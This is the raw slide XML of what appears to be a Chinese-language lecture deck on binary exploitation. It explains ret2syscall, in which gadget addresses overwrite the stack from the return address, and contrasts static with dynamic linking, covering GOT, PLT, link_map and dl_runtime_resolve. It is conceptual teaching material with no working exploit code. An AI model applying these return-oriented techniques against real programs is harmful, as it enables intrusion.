      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649321" y="5920495"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10532341" y="5483977"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>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96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6174715" y="5483977"/>
            <a:ext cx="474606"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A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6174706" y="5483977"/>
            <a:ext cx="9" cy="262161"/>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5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6174706" y="5746138"/>
            <a:ext cx="474614" cy="1010"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10888324" y="5536852"/>
            <a:ext cx="858835"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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1FFE461-B8E4-4C17-A1A3-67FF7C4A0306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193067" y="2769256"/>
            <a:ext cx="3366042"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篡改栈帧上自返回地址开始的一段区域为一系列 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 的地址，最终调用目标系统调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="连接符: 肘形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{477981EA-3FE8-461E-A6E5-DCAFADB62AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="8081575" y="3292548"/>
            <a:ext cx="4949875" cy="11"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 76"/>
              <a:gd name="adj2" fmla="val 2147483646"/>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DDFD6823-6E38-485F-9740-4B2AEF44C443}"/>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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23900453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2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8B9137-02AB-4718-89EF-4573CC640443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439229" y="1686143"/>
            <a:ext cx="141577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动态链接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{109FE739-503F-4113-95FC-6C3E8B44FBCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458033" y="1686144"/>
            <a:ext cx="141577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静态链接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4605FF71-7FA8-4A4D-A909-C396BBB6D83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602187" y="2479254"/>
            <a:ext cx="5089855" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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程序装载进入内存时加载库代码解析外部引用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C6DAE71-9F57-4E68-B9B5-87B74DC70785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6390159" y="2479254"/>
            <a:ext cx="5551520" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>链接器在编译链接时将库代码加入到可执行程序中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{169C472C-1EB6-4548-9412-70BC54B5610C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2965825" y="4290970"/>
            <a:ext cx="6660798"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编译   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>汇编   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>链接   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>装载   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">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A54F0E62-E3B9-4D58-B0A4-2793167A522B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439229" y="4752635"/>
            <a:ext cx="6662401"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代码  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>汇编代码  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>目标文件  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>可执行文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>进程映像</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直接箭头连接符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AEFF90A-F9BB-4633-BB34-63831C427E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3147115" y="2848586"/>
            <a:ext cx="4580209" cy="144238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直接箭头连接符 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ACA1BA0-9CA8-4453-A8A5-5A6C8AE8D784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="24" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6296224" y="2848586"/>
            <a:ext cx="2869695" cy="144238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矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46D01AF8-E213-4DCE-B9C5-8B2A6B3EA662}"/>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动态链接过程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Shape 817"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1487488"/>
            <a:ext cx="2717800" cy="636587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>动态链接相关结构</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="818" name="Shape 818"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="3175200"/>
            <a:ext cx="16520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.dynamic</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Shape 819"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="3584800"/>
            <a:ext cx="16520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.got</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="820" name="Shape 820"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="3994400"/>
            <a:ext cx="16520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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821" name="Shape 821"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844700" y="4404000"/>
            <a:ext cx="16520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.data</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="822" name="Shape 822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="2872467"/>
            <a:ext cx="2542800" cy="409600"/>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addr of .dynamic</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="823" name="Shape 823"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="3282067"/>
            <a:ext cx="2542800" cy="409600"/>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link_map</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="824" name="Shape 824"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="3691667"/>
            <a:ext cx="2542800" cy="409600"/>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dl_runtime_resolve</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="825" name="Shape 825"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="4101267"/>
            <a:ext cx="2542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printf@plt + 6</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Shape 826"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596200" y="4510867"/>
            <a:ext cx="25428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puts</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="827" name="Shape 827"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="822" idx="1"/>
            <a:endCxn id="818" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2496600" y="3077267"/>
            <a:ext cx="1099600" cy="302800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="828" name="Shape 828"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3196333" y="3069500"/>
            <a:ext cx="345600" cy="1673200"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 66935"/>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829" name="Shape 829"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="820" idx="3"/>
            <a:endCxn id="828" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2496700" y="4189600"/>
            <a:ext cx="699600" cy="9600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="830" name="Shape 830"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
